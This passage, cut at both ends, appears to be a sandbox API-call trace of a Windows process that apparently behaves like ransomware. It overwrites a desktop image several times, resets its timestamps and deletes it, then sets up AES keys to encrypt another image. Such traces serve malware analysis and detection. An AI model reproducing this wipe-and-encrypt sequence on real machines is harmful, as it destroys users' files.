(dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0069.536] GetFileType (hFile=0x3d4) returned 0x1 [0069.536] WriteFile (in: hFile=0x3d4, lpBuffer=0x22ae760*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x22ae760*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0069.538] CloseHandle (hObject=0x3d4) returned 1 [0069.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0069.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0069.549] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6n8ddz.png"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcba8d70, ftCreationTime.dwHighDateTime=0x1d4cba2, ftLastAccessTime.dwLowDateTime=0x14d92f90, ftLastAccessTime.dwHighDateTime=0x1d4c9ad, ftLastWriteTime.dwLowDateTime=0x14d92f90, ftLastWriteTime.dwHighDateTime=0x1d4c9ad, nFileSizeHigh=0x0, nFileSizeLow=0x7547)) returned 1 [0069.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0069.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0069.549] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", dwFileAttributes=0x80) returned 1 [0069.550] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0069.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0069.550] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6n8ddz.png"), fInfoLevelId=0x0, lpFileInformation=0x22b6338 | out: lpFileInformation=0x22b6338*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbcba8d70, ftCreationTime.dwHighDateTime=0x1d4cba2, ftLastAccessTime.dwLowDateTime=0x14d92f90, ftLastAccessTime.dwHighDateTime=0x1d4c9ad, ftLastWriteTime.dwLowDateTime=0x14d92f90, ftLastWriteTime.dwHighDateTime=0x1d4c9ad, nFileSizeHigh=0x0, nFileSizeLow=0x7547)) returned 1 [0069.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0069.550] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0069.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0069.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6n8ddz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.550] GetFileType (hFile=0x3d4) returned 0x1 [0069.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0069.550] GetFileType (hFile=0x3d4) returned 0x1 [0069.550] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0069.551] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.552] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.553] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.553] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.554] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.555] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.556] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.556] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0069.556] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0069.557] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.558] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.558] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.559] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.560] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.561] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.562] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.562] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0069.562] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0069.563] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.563] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.564] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.565] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.566] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.566] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.567] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.567] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0069.568] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0069.568] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.569] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.570] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.571] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.571] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.572] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.573] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0069.573] WriteFile (in: hFile=0x3d4, lpBuffer=0x22b67a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22b67a0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0069.573] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0069.573] SetEndOfFile (hFile=0x3d4) returned 1 [0069.632] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0069.632] CloseHandle (hObject=0x3d4) returned 1 [0069.632] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0069.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0069.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6n8ddz.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.633] GetFileType (hFile=0x3d4) returned 0x1 [0069.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0069.633] GetFileType (hFile=0x3d4) returned 0x1 [0069.633] SetFileTime (hFile=0x3d4, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0069.633] CloseHandle (hObject=0x3d4) returned 1 [0069.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0069.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0069.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6n8ddz.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.633] GetFileType (hFile=0x3d4) returned 0x1 [0069.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0069.633] GetFileType (hFile=0x3d4) returned 0x1 [0069.633] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0069.633] CloseHandle (hObject=0x3d4) returned 1 [0069.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0069.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0069.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6n8ddz.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.634] GetFileType (hFile=0x3d4) returned 0x1 [0069.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0069.634] GetFileType (hFile=0x3d4) returned 0x1 [0069.634] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0069.634] CloseHandle (hObject=0x3d4) returned 1 [0069.634] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0069.634] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6n8ddz.png")) returned 1 [0069.635] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0069.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", lpFilePart=0x0) returned 0x46 [0069.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0069.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e36554ecb702fe1a0512e69d1ad6d427"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.636] GetFileType (hFile=0x3d4) returned 0x1 [0069.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0069.636] GetFileType (hFile=0x3d4) returned 0x1 [0069.636] SetFileTime (hFile=0x3d4, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0069.636] CloseHandle (hObject=0x3d4) returned 1 [0069.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", lpFilePart=0x0) returned 0x46 [0069.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0069.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e36554ecb702fe1a0512e69d1ad6d427"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.637] GetFileType (hFile=0x3d4) returned 0x1 [0069.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0069.637] GetFileType (hFile=0x3d4) returned 0x1 [0069.637] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0069.637] CloseHandle (hObject=0x3d4) returned 1 [0069.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", lpFilePart=0x0) returned 0x46 [0069.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0069.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e36554ecb702fe1a0512e69d1ad6d427"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.637] GetFileType (hFile=0x3d4) returned 0x1 [0069.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0069.637] GetFileType (hFile=0x3d4) returned 0x1 [0069.637] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0069.638] CloseHandle (hObject=0x3d4) returned 1 [0069.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.639] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.640] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7610) returned 1 [0069.641] CryptImportKey (in: hProv=0x1a5b7610, pbData=0x22b9ad0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a6269f0) returned 1 [0069.641] CryptContextAddRef (hProv=0x1a5b7610, pdwReserved=0x0, dwFlags=0x0) returned 1 [0069.641] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0069.641] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22b9bc0, pdwDataLen=0x1bf5db30 | out: pbData=0x22b9bc0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0069.641] CryptImportKey (in: hProv=0x1a5b7610, pbData=0x22b9ce0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626a60) returned 1 [0069.641] CryptContextAddRef (hProv=0x1a5b7610, pdwReserved=0x0, dwFlags=0x0) returned 1 [0069.641] CryptContextAddRef (hProv=0x1a5b7610, pdwReserved=0x0, dwFlags=0x0) returned 1 [0069.641] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626b40) returned 1 [0069.641] CryptContextAddRef (hProv=0x1a5b7610, pdwReserved=0x0, dwFlags=0x0) returned 1 [0069.641] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x4, pbData=0x22b9e28*=0x1, dwFlags=0x0) returned 1 [0069.641] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x1, pbData=0x22b9dd8, dwFlags=0x0) returned 1 [0069.641] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0069.641] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0069.641] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg", lpFilePart=0x0) returned 0x31 [0069.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0069.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eviCleE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eviclee.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.642] GetFileType (hFile=0x3d4) returned 0x1 [0069.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0069.642] GetFileType (hFile=0x3d4) returned 0x1 [0069.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2485DB33939563D3B5B58AF28B3A08D8", lpFilePart=0x0) returned 0x46 [0069.642] SetThreadErrorMode (dwNewMode=0x1, 